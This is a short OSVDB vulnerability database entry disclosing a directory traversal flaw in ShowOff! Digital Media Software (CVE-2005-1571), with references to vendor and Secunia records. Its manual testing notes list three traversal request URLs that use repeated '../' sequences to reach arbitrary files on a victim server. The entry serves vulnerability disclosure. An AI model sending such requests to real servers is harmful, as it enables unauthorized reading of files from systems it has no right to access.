ShowOff! Digital Media Software Request Handling Traversal Arbitrary File Access

2005-05-10T10:13:02
ID OSVDB:16332
Type osvdb
Reporter OSVDB
Modified 2005-05-10T10:13:02

Description

Manual Testing Notes

http://[victim]/ShowAlbum?ShowDetails&1&nocount&/../../../../../../../../ [file] http://[victim]/ShowVideo?1&fullnocount&/../../../../../../../../../../[file] http://[victim]/ShowGraphic?/../../../../../../../../[file]

References:

Vendor URL: http://www.showoffmypictures.com/ Secunia Advisory ID:15300 Related OSVDB ID: 16333 CVE-2005-1571